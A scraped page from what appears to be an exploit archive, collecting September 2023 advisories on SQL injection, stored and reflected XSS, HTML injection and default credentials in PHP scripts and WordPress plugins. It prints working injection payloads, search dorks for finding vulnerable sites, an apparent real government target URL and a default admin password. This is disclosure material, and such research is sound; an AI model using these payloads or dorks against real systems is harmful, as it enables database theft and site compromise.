Fundraising Script version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Fundraising Script-1.0 SQLi## Author: nu11secur1ty## Date: 09/13/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The `cid` parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the cid parameter, and a database errormessage was returned.The database is empty, but if it is not, this will be over for themoney of the donors and their bank accounts!The attacker can steal all information from the database!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: cid (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT(ELT(1741=1741,1))),0x7162787171),3873))---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/fundraising-script-10-sqli.html)## Time spent:01:15:00

Fundraising Script 1.0 SQL Injection

Blood Bank and Donor Management System version 2.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS# Application: Blood Donor Management System# Version: v2.2   # Bugs:  Stored XSS# Technology: PHP# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/# Date: 12.09.2023# Author: SoSPiro# Tested on: Windows#POC========================================1. Login to admin account2. Go to /admin/update-contactinfo.php3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.

Blood Bank And Donor Management System 2.2 Cross Site Scripting

Kleeja version 1.5.4 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Kleeja v1.5.4 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.kleeja.com/                                                                                             || # Dork      : Powered by Kleeja                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : index.php/%22%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3ETest%3C/font%3E%3C/marquee%3E%3d%27prompt%28987964%29%27bad%3d%22%3E[+] http://127.0.0.1/kleeja/1/index.php/%22%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3ETest%3C/font%3E%3C/marquee%3E%3d%27prompt%28987964%29%27bad%3d%22%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Kleeja 1.5.4 Cross Site Scripting

K-LOANS version 1.4.5 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : K-LOANS v1.4.5 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/loan-management-system/11454263                                                        || # Dork      : K-LOANS 1.4.5                                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] leaves a default set of administrative credentials installed post installation.[+] user : admin & pass = admin123[+] http://182.166.255.0wwwgarciuzcom/prestar/index.php/homeGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

K-LOANS 1.4.5 Insecure Settings

The Leyka plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 3.30.3 via the 'leyka_ajax_get_env_and_options' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including Sberbank API key and password, PayPal Client Secret, and more keys and passwords.

CVE-2023-4917: leyka-ajax.php in leyka/tags/3.30.3/inc – WordPress Plugin Repository

The Login with phone number plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.8. This is due to missing nonce validation on the 'lwp_update_password_action' function. This makes it possible for unauthenticated attackers to change user password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2023-4916: login-with-phonenumber.php in login-with-phone-number/trunk – WordPress Plugin Repository

Cross Site Scripting vulnerability in WP Githuber MD plugin v.1.16.2 allows a remote attacker to execute arbitrary code via a crafted payload to the new article function.

When I used this plugin to write MD articles, I encountered a stored XSS vulnerability

Steps to reproduce the behavior:

1.  Enable WP Githuber MD v1.16.2 plugin
    
2.  Write new articles (via MD editor of this plugin)
    
3.  Insert the following JS code:（Note that I added Tab spaces！！！）
    
    </textarea><script>alert('aaa hack');</script>
    
4.  Publish articles
    

**Additional context**

（Note that I added Tab spaces！！！），，，As an article, it should not take the content of the article as js code and let the client browser execute it, which is very dangerous and may lead to phishing

**Server environment**

*   WordPress version \[ 6.3 \]
*   WP Githuber MD plugin version \[ 1.16.2 \]
*   PHP version \[ 7.4 \]

CVE-2023-41423: There is a stored XSS vulnerability · Issue #316 · terrylinooo/githuber-md

Equipment Rental Script version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Equipment Rental Script-1.0 - SQLi## Author: nu11secur1ty## Date: 09/12/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The package_id parameter appears to be vulnerable to SQL injectionattacks. The payload ' was submitted in the package_id parameter, anda database error message was returned. You should review the contentsof the error message, and the application's handling of other input,to confirm whether a vulnerability is present. The attacker can stealall information from the database!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: #1* ((custom) POST)    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: package_id=(-4488))) OR 1 GROUP BYCONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0END)),0x7176717671,FLOOR(RAND(0)*2)) HAVINGMIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/phpjabbers-equipment-rental-script-10.html)## Time spent:00:25:00

Equipment Rental Script 1.0 SQL Injection

Kolifa Download CMS version 1.2 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Kolifa Download CMS v1.2 HTML Inject Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.scriptmafia.org                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : arama.php?dwbaslik=%3Cmarquee%3E%3Cfont+color%3Dlime+size%3D32%3EHacked+by+indoushka%3C%2Ffont%3E%3C%2Fmarquee%3E&ara=Ara[+] http://127.0.0.1/Kolifa/arama.php?dwbaslik=%3Cmarquee%3E%3Cfont+color%3Dlime+size%3D32%3EHacked+by+indoushka%3C%2Ffont%3E%3C%2Fmarquee%3E&ara=AraGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Kolifa Download CMS 1.2 HTML Injection

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

Posted Sep 12, 2023

Authored by indoushka

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | bd48e4a98638b72cd97b9bc442df28c3737e9b1208d03e5a4a7f58660e0bf243

Download | Favorite | View

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : KALIMATAN GMS V1.0.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://teppa.kaltimprov.go.id/                                                                                     |  | # Dork      : inurl:/front/grafik.php?tahun=                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : <script>alert(/indoushka/);</script>[+] http://Targetteppa.kaltimprovgoid/front/grafik.php?tahun=2018&bulan=%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,177)
*   Arbitrary (16,247)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,301)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,519)
*   Encryption (2,371)
*   Exploit (52,086)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,704)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,852)
*   Root (3,590)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,895)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,409)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,825)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,994)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,833)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,676)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,841)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,896)
*   UNIX (9,306)
*   UnixWare (186)
*   Windows (6,584)
*   Other

Tag

#php